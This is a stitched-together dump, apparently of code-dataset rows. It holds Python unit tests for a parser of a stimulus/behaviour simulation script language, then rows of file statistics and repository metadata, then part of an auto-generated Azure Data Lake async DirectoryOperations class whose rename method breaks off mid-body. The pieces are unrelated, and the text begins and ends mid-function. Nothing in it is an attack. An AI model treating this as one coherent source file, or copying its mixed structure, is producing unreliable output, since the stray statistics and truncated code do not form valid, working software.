    # The stop condition is first checked on the second call.
    phase.next_stimulus(None)
    with self.assertRaisesMsg(msg):
        phase.next_stimulus('b1')
    # Stop condition that is not boolean.
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e1
L1 e1 | L2
L2 e2 | L1
'''
    phase = parse(text, 'phase_label')
    msg = "Condition 'e1' is not a boolean expression."
    phase.next_stimulus(None)
    with self.assertRaisesMsg(msg):
        phase.next_stimulus('b1')
    # count is only for line actions. For stop conditions, use b1=5 instead.
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:count(b1)=5
L1 e1 | H1
H1 | L2
L2 e2 | L1
'''
    phase = parse(text, 'phase_label')
    msg = "Unknown variable 'count'."
    phase.next_stimulus(None)
    with self.assertRaisesMsg(msg):
        phase.next_stimulus('b1')
def test_no_stopcond(self):
    """A @PHASE directive without any stop clause must raise."""
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label
L1 e1 | L2
L2 e2 | L1
'''
    msg = "@PHASE line must have the form '@PHASE label stop:condition'."
    with self.assertRaisesMsg(msg):
        parse(text, 'phase_label')
def test_empty_stopcond(self):
    """'stop:' with no condition, a stray word, or a misspelled keyword all raise."""
    # Empty condition after 'stop:'.
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:
L1 e1 | L2
L2 e2 | L1
'''
    msg = "Phase stop condition must have the form 'stop:condition'."
    with self.assertRaisesMsg(msg):
        parse(text, 'phase_label')
    # A word that is not a stop clause at all.
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label blaps
L1 e1 | L2
L2 e2 | L1
'''
    msg = "Phase stop condition must have the form 'stop:condition'."
    with self.assertRaisesMsg(msg):
        parse(text, 'phase_label')
    # Misspelled 'stop' keyword.
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stopp:e1=10
L1 e1 | L2
L2 e2 | L1
'''
    msg = "Phase stop condition must have the form 'stop:condition'."
    with self.assertRaisesMsg(msg):
        parse(text, 'phase_label')
def test_help_line_with_response(self):
    """A help line (no stimulus) may not have a response-dependent condition."""
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e1=10
L1 e1 | H
H | b1:L1 | L1
'''
    msg = "Condition on help line cannot depend on response."
    with self.assertRaisesMsg(msg):
        parse(text, 'phase_label')
def test_modify_global_variable(self):
    """Variables declared in @variables cannot be reassigned inside a phase."""
    text = '''
@variables var1:1, var2:2*var1+1
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:count(H1)=10
L1 e1 | H1
H1 var1:var1+1 | L2
L2 e2 | L1
'''
    msg = "Cannot modify global variable inside a phase."
    with self.assertRaisesMsg(msg):
        parse(text, 'phase_label')
def test_unknown_local_variable(self):
    """Using an undefined name ('y') in an assignment fails when evaluated."""
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:local_var=5
L0 local_var:y | L1
L1 e1 | L2
L2 e2 | H1
H1 local_var:local_var+1 | L1
'''
    phase = parse(text, 'phase_label')
    msg = "Unknown variable 'y'."
    with self.assertRaisesMsg(msg):
        phase.next_stimulus(None)
def test_syntax_error_in_expression(self):
    """A syntactically invalid expression ('1+/1') fails when first evaluated."""
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:local_var=5
L0 local_var: 1+/1 | L1
L1 e1 | L2
L2 e2 | H1
H1 local_var:local_var+1 | L1
'''
    phase = parse(text, 'phase_label')
    msg = "Error in expression '1+/1': invalid syntax."
    with self.assertRaisesMsg(msg):
        phase.next_stimulus(None)
def test_cannot_evaluate_expression(self):
    """A well-formed expression with wrong arity ('rand(1,)') fails at evaluation."""
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:local_var=5
L0 local_var: rand(1,) | L1
L1 e1 | L2
L2 e2 | H1
H1 local_var:local_var+1 | L1
'''
    phase = parse(text, 'phase_label')
    msg = "Cannot evaluate expression 'rand(1,)': rand() missing 1 required positional argument: 'stop'."
    with self.assertRaisesMsg(msg):
        phase.next_stimulus(None)
def test_eval_output_not_number(self):
    """An expression evaluating to a non-number (a string) is a runtime error."""
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:local_var=5
L0 local_var:'foo' | L1
L1 e1 | L2
L2 e2 | H1
H1 local_var:local_var+1 | L1
'''
    phase = parse(text, 'phase_label')
    msg = "Error in expression ''foo''."
    with self.assertRaisesMsg(msg):
        phase.next_stimulus(None)
def test_invalid_count_reset(self):
    """count_reset() with an unknown event name must raise at parse time."""
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e2=3
L1 e1 | count(e1)=5 : H | L2
L2 e1 | L1
H count_reset(e1X) | L3
L3 e2 | L1
'''
    msg = "Unknown event 'e1X' in count_reset."
    with self.assertRaisesMsg(msg):
        parse(text, 'phase_label')
def test_invalid_line_label_in_logic(self):
    """A goto target ('H') that matches no phase line label is an unknown action."""
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:False # Never stop
XL1 e1 | count(b1)>=5 : H | L2
XL2 e1 | L1
XH count_reset(b1) | L3
XL3 e2 | L1
'''
    msg = "Unknown action 'H'."
    with self.assertRaisesMsg(msg):
        parse(text, 'phase_label')
def test_phase_line_contains_only_label(self):
    """A phase line consisting of just a label ('XL2') must raise."""
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE thelabel stop:foo
XL1 e1 | count(b1)>=5 : H | L2
XL2
XH count_reset(b1) | L3
XL3 e2 | L1
'''
    msg = "Phase line contains only label."
    with self.assertRaisesMsg(msg):
        parse(text, 'thelabel')
def test_phase_line_label_is_stimulus(self):
    """A phase line label may not coincide with a stimulus element name."""
    text = '''
stimulus_elements: e1, e2, FOO
behaviors: b1, b2
@PHASE thelabel stop:False
FOO e1 | count(b1)>=5 : H | L2
b1 e1
H count_reset(b1) | L3
L3 e2 | L1
'''
    msg = "The phase line label 'FOO' coincides with the name of a stimulus element."
    with self.assertRaisesMsg(msg):
        parse(text, 'thelabel')
def test_phase_line_label_is_behavior(self):
    """A phase line label may not coincide with a behavior name."""
    text = '''
stimulus_elements: e1, e2, FOO
behaviors: b1, b2, BAR
@PHASE thelabel stop:False
L1 e1 | count(b1)>=5 : H | b1
b1 e1 | L1
BAR count_reset(b1) | L3
L3 e2 | L1
'''
    msg = "The phase line label 'b1' coincides with the name of a behavior."
    with self.assertRaisesMsg(msg):
        parse(text, 'thelabel')
def test_duplicate_phase_line_label(self):
    """Two phase lines with the same label ('L1') must raise."""
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e1 | H
H e1 | L1
BAR count_reset(b1) | H
L1 e2 | L1
'''
    msg = "Duplicate of phase line label 'L1'."
    with self.assertRaisesMsg(msg):
        parse(text, 'thelabel')
def test_not_parsed(self):
    """Calling next_stimulus on a phase that failed parsing must raise."""
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e1 | H
H e1 | L1
BAR count_reset(b1) | H
L1 e2 | L1
'''
    script = Script(text)
    script.parse()
    script_parser = script.script_parser
    # Fetch the phase object directly (bypassing the normal run flow).
    phase_obj = script_parser.phases.phases['thelabel']
    with self.assertRaises(Exception):
        phase_obj.next_stimulus(None)
def test_missing_separator(self):
    """A phase line without the '|' separator must raise."""
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e1 | L2
L2 e2
'''
    msg = "Missing separator '|' on phase line."
    with self.assertRaisesMsg(msg):
        parse(text, 'thelabel')
def test_unknown_stimulus_element_or_action(self):
    """A misspelled stimulus element or count_reset keyword is an unknown action."""
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e11 | L2
L2 e2 | L1
'''
    msg = "Unknown action 'e11'."
    with self.assertRaisesMsg(msg):
        parse(text, 'thelabel')
    # Misspelled count_reset.
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 coun_reset(e1) | L2
L2 e2 | L1
'''
    msg = "Unknown action 'coun_reset(e1)'."
    with self.assertRaisesMsg(msg):
        parse(text, 'thelabel')
def test_invalid_stimulus_element(self):
    """In a compound stimulus 'e1,e11', every element must be declared."""
    text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e1,e11 | L2
L2 e2 | L1
'''
    msg = "Expected a stimulus element, got 'e11'."
    with self.assertRaisesMsg(msg):
        parse(text, 'thelabel')
def test_no_conditions(self):
    """A phase line with an empty condition part must raise."""
    expected = "Line with label 'L2' has no conditions."
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e1 | L2
L2 e2 |
'''
    with self.assertRaisesMsg(expected):
        parse(script, 'thelabel')
def test_unknown_event_in_count_reset(self):
    """count_reset() of an undeclared event name must raise."""
    expected = "Unknown event 'foo' in count_reset."
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e1 | L2
L2 count_reset(foo) |
'''
    with self.assertRaisesMsg(expected):
        parse(script, 'thelabel')
def test_no_condition_met(self):
    """Stepping a phase whose line has no satisfiable condition must raise."""
    # Deterministic conditions, none of which can match response 'b1'.
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop:e1==10
L1 e1 | b3=7:L2 | b2=42:L2
L2 e2 | L1
'''
    phase = parse(script, 'thelabel')
    first_stimulus = phase.next_stimulus(None)[0]
    self.assertEqual(first_stimulus, {'e1': 1})
    expected = "No condition in 'b3=7:L2 | b2=42:L2' was met for response 'b1'."
    with self.assertRaisesMsg(expected):
        phase.next_stimulus('b1')

    # Probabilistic goto (1/6 each, summing to 1/2) — must eventually fail.
    script = """
mechanism: ga
stimulus_elements : lever1, lever2, lever3, reward
behaviors : R
@phase vi stop: reward=25000
FI3 lever1 | count_line()=3:ON | FI3
FI2 lever2 | count_line()=2:ON | FI2
ON lever3 | R:REWARD | ON
REWARD reward | ON(1/6),FI2(1/6),FI3(1/6)
@run vi
"""
    phase = parse(script, 'vi')
    first_stimulus = phase.next_stimulus(None)[0]
    expected = "No condition in 'ON(1/6),FI2(1/6),FI3(1/6)' was met for response 'R'."
    with self.assertRaisesMsg(expected):
        for _ in range(100):
            phase.next_stimulus('R')
def test_prob_greater_than_1(self):
    """Probabilistic goto branches whose probabilities sum above 1 must raise."""
    expected = "Sum of probabilities is 1.5>1."
    script = """
mechanism: ga
stimulus_elements : lever1, lever2, lever3, reward
behaviors : R
@phase vi stop: reward=25000
FI3 lever1 | count_line()=3:ON | FI3
FI2 lever2 | count_line()=2:ON | FI2
ON lever3 | R:REWARD | ON
REWARD reward | ON(1/2),FI2(1/2),FI3(1/2)
@run vi
"""
    with self.assertRaisesMsg(expected):
        run(script)
def test_condition_has_more_than_one_colon(self):
    """A condition containing '::' must be reported as an invalid statement."""
    expected = "Error on line 5: Invalid statement 'b3=1 :: L2'."
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e1 | b3=1 :: L2 | L1
L2 e2 | L1
'''
    with self.assertRaisesMsg(expected):
        parse(script, 'thelabel')
def test_condition_not_boolean(self):
    """Non-boolean conditions are rejected; behavior names are valid conditions."""
    # A bare number is not a boolean condition.
    script = '''
mechanism: sr
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | 42:L2 | L1
L2 e2 | L1
@run thelabel
'''
    with self.assertRaisesMsg("Condition '42' is not a boolean expression."):
        run(script)

    # A stimulus element name cannot be used as a condition variable.
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | e1:L2 | L1
L2 e2 | L1
'''
    with self.assertRaisesMsg("Variable name 'e1' equals a stimulus element name."):
        parse(script, 'thelabel')

    # A behavior name used as a condition matches that response.
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | b1:L2 | L1
L2 e2 | L1
'''
    phase = parse(script, 'thelabel')
    phase.next_stimulus(None)
    self.assertEqual(phase.next_stimulus('b1')[0], {'e2': 1})

    # A behavior condition that does not match falls through to the default.
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | b1:L2 | L1
L2 e2 | L1
'''
    phase = parse(script, 'thelabel')
    phase.next_stimulus(None)
    self.assertEqual(phase.next_stimulus('b2')[0], {'e1': 1})
def test_invalid_condition(self):
    """Malformed goto lists and probabilities are rejected with precise messages."""
    # An unconditional goto label cannot be followed by more items.
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2,L1 | L1
L2 e2 | L1
'''
    with self.assertRaisesMsg("Error on line 5: The unconditional goto row label 'L2,L1' cannot be continued."):
        parse(script, 'thelabel')

    # Mixing probabilistic and bare labels in one goto list is invalid.
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2(0.5),L1 | L1
L2 e2 | L1
'''
    with self.assertRaisesMsg("Invalid condition 'L2(0.5),L1'."):
        parse(script, 'thelabel')

    # Doubled parentheses make the whole term an unknown action.
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2((0.5)),L1(0.1) | L1
L2 e2 | L1
'''
    with self.assertRaisesMsg("Unknown action 'L2((0.5))'."):
        parse(script, 'thelabel')

    # Reversed parentheses are an unknown action.
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2)0.5(,L1(0.1) | L1
L2 e2 | L1
'''
    with self.assertRaisesMsg("Unknown action 'L2)0.5('."):
        parse(script, 'thelabel')

    # A probabilistic goto to a nonexistent label is an unknown action.
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2(0.5), LL1(0.1) | L1
L2 e2 | L1
'''
    with self.assertRaisesMsg("Unknown action 'LL1(0.1)'."):
        parse(script, 'thelabel')

    # A probability above 1 is invalid.
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2(0.5), L1(1.1) | L1
L2 e2 | L1
'''
    with self.assertRaisesMsg("Invalid condition 'L2(0.5),L1(1.1)'. Expected a probability, got '1.1'."):
        parse(script, 'thelabel')

    # A negative probability is invalid.
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2(0.2),L1(-0.9) | L1
L2 e2 | L1
'''
    with self.assertRaisesMsg("Invalid condition 'L2(0.2),L1(-0.9)'. Expected a probability, got '-0.9'."):
        parse(script, 'thelabel')

    # The same label may not appear twice in one goto list.
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2(0.5),L1(0.2),L2(0.01) | L1
L2 e2 | L1
L3 e1 | L2
'''
    with self.assertRaisesMsg("Invalid condition 'L2(0.5),L1(0.2),L2(0.01)'. Label 'L2' duplicated."):
        parse(script, 'thelabel')

    # A goto to a label that does not exist is an unknown action.
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L22 | L1
L2 e2 | L1
'''
    with self.assertRaisesMsg("Unknown action 'L22'."):
        parse(script, 'thelabel')

    # Probabilities summing above 1 are rejected at run time.
    script = '''
mechanism: ga
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2(0.2),L1(0.9) | L1
L2 e2 | L1
@run thelabel
'''
    with self.assertRaisesMsg("Sum of probabilities is 1.1>1."):
        run(script)
def test_invalid_phase_label(self):
    """A phase label that is not a valid identifier must be rejected."""
    expected = "Phase label '123thelabel' is not a valid identifier."
    script = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE 123thelabel stop : e1==4
L1 e1 | L2(0.2),L1(0.9) | L1
L2 e2 | L1
'''
    with self.assertRaisesMsg(expected):
        parse(script, 'thelabel')
| 32.45573
| 121
| 0.510788
| 10,477
| 84,677
| 4.035793
| 0.03102
| 0.08656
| 0.094482
| 0.130667
| 0.924509
| 0.917153
| 0.90294
| 0.894804
| 0.880969
| 0.855781
| 0
| 0.072883
| 0.360936
| 84,677
| 2,608
| 122
| 32.468175
| 0.708486
| 0.016404
| 0
| 0.840125
| 0
| 0.019704
| 0.457262
| 0.003856
| 0
| 0
| 0
| 0
| 0.16704
| 1
| 0.037618
| false
| 0.003583
| 0.001791
| 0
| 0.042544
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a53532e364f1fe58adbf6679b322f66b705fa7d
| 42,423
|
py
|
Python
|
src/storage-blob-preview/azext_storage_blob_preview/vendored_sdks/azure_storage_blob/v2020_02_10/_generated/aio/operations_async/_directory_operations_async.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 207
|
2017-11-29T06:59:41.000Z
|
2022-03-31T10:00:53.000Z
|
src/storage-blob-preview/azext_storage_blob_preview/vendored_sdks/azure_storage_blob/v2020_02_10/_generated/aio/operations_async/_directory_operations_async.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 4,061
|
2017-10-27T23:19:56.000Z
|
2022-03-31T23:18:30.000Z
|
src/storage-blob-preview/azext_storage_blob_preview/vendored_sdks/azure_storage_blob/v2020_02_10/_generated/aio/operations_async/_directory_operations_async.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 802
|
2017-10-11T17:36:26.000Z
|
2022-03-31T22:24:32.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import map_error
from ... import models
class DirectoryOperations:
"""DirectoryOperations async operations.
You should not instantiate directly this class, but create a Client instance that will create it for you and attach it as attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar resource: . Constant value: "directory".
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
    """Store the pipeline client, configuration and (de)serializers.

    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    self._config = config
    self._client = client
    self._deserialize = deserializer
    self._serialize = serializer
    # Constant sub-resource identifier sent as the 'resource' query parameter.
    self.resource = "directory"
async def create(self, timeout=None, directory_properties=None, posix_permissions=None, posix_umask=None, request_id=None, directory_http_headers=None, lease_access_conditions=None, modified_access_conditions=None, *, cls=None, **kwargs):
    """Create a directory. By default, the destination is overwritten and if
    the destination already exists and has a lease the lease is broken.
    This operation supports conditional HTTP requests. For more
    information, see [Specifying Conditional Headers for Blob Service
    Operations](https://docs.microsoft.com/en-us/rest/api/storageservices/specifying-conditional-headers-for-blob-service-operations).
    To fail if the destination already exists, use a conditional request
    with If-None-Match: "*".

    :param timeout: The timeout parameter is expressed in seconds. For
     more information, see <a
     href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-timeouts-for-blob-service-operations">Setting
     Timeouts for Blob Service Operations.</a>
    :type timeout: int
    :param directory_properties: Optional. User-defined properties to be
     stored with the file or directory, in the format of a comma-separated
     list of name and value pairs "n1=v1, n2=v2, ...", where each value is
     base64 encoded.
    :type directory_properties: str
    :param posix_permissions: Optional and only valid if Hierarchical
     Namespace is enabled for the account. Sets POSIX access permissions
     for the file owner, the file owning group, and others. Each class may
     be granted read, write, or execute permission. The sticky bit is also
     supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g.
     0766) are supported.
    :type posix_permissions: str
    :param posix_umask: Only valid if Hierarchical Namespace is enabled
     for the account. This umask restricts permission settings for file and
     directory, and will only be applied when default Acl does not exist in
     parent directory. If the umask bit has set, it means that the
     corresponding permission will be disabled. Otherwise the corresponding
     permission will be determined by the permission. A 4-digit octal
     notation (e.g. 0022) is supported here. If no umask was specified, a
     default umask - 0027 will be used.
    :type posix_umask: str
    :param request_id: Provides a client-generated, opaque value with a 1
     KB character limit that is recorded in the analytics logs when storage
     analytics logging is enabled.
    :type request_id: str
    :param directory_http_headers: Additional parameters for the operation
    :type directory_http_headers: ~.models.DirectoryHttpHeaders
    :param lease_access_conditions: Additional parameters for the operation
    :type lease_access_conditions: ~.models.LeaseAccessConditions
    :param modified_access_conditions: Additional parameters for the operation
    :type modified_access_conditions: ~.models.ModifiedAccessConditions
    :param callable cls: A custom type or function that will be passed the
     direct response
    :return: None or the result of cls(response)
    :rtype: None
    :raises:
     :class:`DataLakeStorageErrorException<.models.DataLakeStorageErrorException>`
    """
    # Caller may override the status-code -> exception mapping via kwargs.
    error_map = kwargs.pop('error_map', None)
    # Flatten the optional parameter-grouping models into individual values;
    # each stays None when its grouping object was not supplied.
    cache_control = None
    if directory_http_headers is not None:
        cache_control = directory_http_headers.cache_control
    content_type = None
    if directory_http_headers is not None:
        content_type = directory_http_headers.content_type
    content_encoding = None
    if directory_http_headers is not None:
        content_encoding = directory_http_headers.content_encoding
    content_language = None
    if directory_http_headers is not None:
        content_language = directory_http_headers.content_language
    content_disposition = None
    if directory_http_headers is not None:
        content_disposition = directory_http_headers.content_disposition
    lease_id = None
    if lease_access_conditions is not None:
        lease_id = lease_access_conditions.lease_id
    if_modified_since = None
    if modified_access_conditions is not None:
        if_modified_since = modified_access_conditions.if_modified_since
    if_unmodified_since = None
    if modified_access_conditions is not None:
        if_unmodified_since = modified_access_conditions.if_unmodified_since
    if_match = None
    if modified_access_conditions is not None:
        if_match = modified_access_conditions.if_match
    if_none_match = None
    if modified_access_conditions is not None:
        if_none_match = modified_access_conditions.if_none_match

    # Construct URL
    url = self.create.metadata['url']
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True)
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
    # 'resource=directory' distinguishes directory creation from file creation.
    query_parameters['resource'] = self._serialize.query("self.resource", self.resource, 'str')

    # Construct headers
    header_parameters = {}
    if directory_properties is not None:
        header_parameters['x-ms-properties'] = self._serialize.header("directory_properties", directory_properties, 'str')
    if posix_permissions is not None:
        header_parameters['x-ms-permissions'] = self._serialize.header("posix_permissions", posix_permissions, 'str')
    if posix_umask is not None:
        header_parameters['x-ms-umask'] = self._serialize.header("posix_umask", posix_umask, 'str')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    if request_id is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id", request_id, 'str')
    if cache_control is not None:
        header_parameters['x-ms-cache-control'] = self._serialize.header("cache_control", cache_control, 'str')
    if content_type is not None:
        header_parameters['x-ms-content-type'] = self._serialize.header("content_type", content_type, 'str')
    if content_encoding is not None:
        header_parameters['x-ms-content-encoding'] = self._serialize.header("content_encoding", content_encoding, 'str')
    if content_language is not None:
        header_parameters['x-ms-content-language'] = self._serialize.header("content_language", content_language, 'str')
    if content_disposition is not None:
        header_parameters['x-ms-content-disposition'] = self._serialize.header("content_disposition", content_disposition, 'str')
    if lease_id is not None:
        header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
    if if_modified_since is not None:
        header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", if_modified_since, 'rfc-1123')
    if if_unmodified_since is not None:
        header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", if_unmodified_since, 'rfc-1123')
    if if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
    if if_none_match is not None:
        header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')

    # Construct and send request
    request = self._client.put(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # 201 Created is the only success status for this operation.
    if response.status_code not in [201]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise models.DataLakeStorageErrorException(response, self._deserialize)

    if cls:
        response_headers = {
            'ETag': self._deserialize('str', response.headers.get('ETag')),
            'Last-Modified': self._deserialize('rfc-1123', response.headers.get('Last-Modified')),
            'x-ms-client-request-id': self._deserialize('str', response.headers.get('x-ms-client-request-id')),
            'x-ms-request-id': self._deserialize('str', response.headers.get('x-ms-request-id')),
            'x-ms-version': self._deserialize('str', response.headers.get('x-ms-version')),
            'Content-Length': self._deserialize('long', response.headers.get('Content-Length')),
            'Date': self._deserialize('rfc-1123', response.headers.get('Date')),
        }
        return cls(response, None, response_headers)
create.metadata = {'url': '/{filesystem}/{path}'}
async def rename(self, rename_source, timeout=None, marker=None, path_rename_mode=None, directory_properties=None, posix_permissions=None, posix_umask=None, source_lease_id=None, request_id=None, directory_http_headers=None, lease_access_conditions=None, modified_access_conditions=None, source_modified_access_conditions=None, *, cls=None, **kwargs):
    """Rename a directory. By default, the destination is overwritten and if
    the destination already exists and has a lease the lease is broken.
    This operation supports conditional HTTP requests. For more
    information, see [Specifying Conditional Headers for Blob Service
    Operations](https://docs.microsoft.com/en-us/rest/api/storageservices/specifying-conditional-headers-for-blob-service-operations).
    To fail if the destination already exists, use a conditional request
    with If-None-Match: "*".

    :param rename_source: The file or directory to be renamed. The value
     must have the following format: "/{filesystem}/{path}". If
     "x-ms-properties" is specified, the properties will overwrite the
     existing properties; otherwise, the existing properties will be
     preserved.
    :type rename_source: str
    :param timeout: The timeout parameter is expressed in seconds. For
     more information, see <a
     href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-timeouts-for-blob-service-operations">Setting
     Timeouts for Blob Service Operations.</a>
    :type timeout: int
    :param marker: When renaming a directory, the number of paths that are
     renamed with each invocation is limited. If the number of paths to be
     renamed exceeds this limit, a continuation token is returned in this
     response header. When a continuation token is returned in the
     response, it must be specified in a subsequent invocation of the
     rename operation to continue renaming the directory.
    :type marker: str
    :param path_rename_mode: Determines the behavior of the rename
     operation. Possible values include: 'legacy', 'posix'
    :type path_rename_mode: str or ~.models.PathRenameMode
    :param directory_properties: Optional. User-defined properties to be
     stored with the file or directory, in the format of a comma-separated
     list of name and value pairs "n1=v1, n2=v2, ...", where each value is
     base64 encoded.
    :type directory_properties: str
    :param posix_permissions: Optional and only valid if Hierarchical
     Namespace is enabled for the account. Sets POSIX access permissions
     for the file owner, the file owning group, and others. Each class may
     be granted read, write, or execute permission. The sticky bit is also
     supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g.
     0766) are supported.
    :type posix_permissions: str
    :param posix_umask: Only valid if Hierarchical Namespace is enabled
     for the account. This umask restricts permission settings for file and
     directory, and will only be applied when default Acl does not exist in
     parent directory. If the umask bit has set, it means that the
     corresponding permission will be disabled. Otherwise the corresponding
     permission will be determined by the permission. A 4-digit octal
     notation (e.g. 0022) is supported here. If no umask was specified, a
     default umask - 0027 will be used.
    :type posix_umask: str
    :param source_lease_id: A lease ID for the source path. If specified,
     the source path must have an active lease and the lease ID must match.
    :type source_lease_id: str
    :param request_id: Provides a client-generated, opaque value with a 1
     KB character limit that is recorded in the analytics logs when storage
     analytics logging is enabled.
    :type request_id: str
    :param directory_http_headers: Additional parameters for the operation
    :type directory_http_headers: ~.models.DirectoryHttpHeaders
    :param lease_access_conditions: Additional parameters for the operation
    :type lease_access_conditions: ~.models.LeaseAccessConditions
    :param modified_access_conditions: Additional parameters for the operation
    :type modified_access_conditions: ~.models.ModifiedAccessConditions
    :param source_modified_access_conditions: Additional parameters for
     the operation
    :type source_modified_access_conditions:
     ~.models.SourceModifiedAccessConditions
    :param callable cls: A custom type or function that will be passed the
     direct response
    :return: None or the result of cls(response)
    :rtype: None
    :raises:
     :class:`DataLakeStorageErrorException<.models.DataLakeStorageErrorException>`
    """
    # Caller may override the status-code -> exception mapping via kwargs.
    error_map = kwargs.pop('error_map', None)
    # Flatten the optional parameter-grouping models into individual values;
    # each stays None when its grouping object was not supplied.
    cache_control = None
    if directory_http_headers is not None:
        cache_control = directory_http_headers.cache_control
    content_type = None
    if directory_http_headers is not None:
        content_type = directory_http_headers.content_type
    content_encoding = None
    if directory_http_headers is not None:
        content_encoding = directory_http_headers.content_encoding
    content_language = None
    if directory_http_headers is not None:
        content_language = directory_http_headers.content_language
    content_disposition = None
    if directory_http_headers is not None:
        content_disposition = directory_http_headers.content_disposition
    lease_id = None
    if lease_access_conditions is not None:
        lease_id = lease_access_conditions.lease_id
    if_modified_since = None
    if modified_access_conditions is not None:
        if_modified_since = modified_access_conditions.if_modified_since
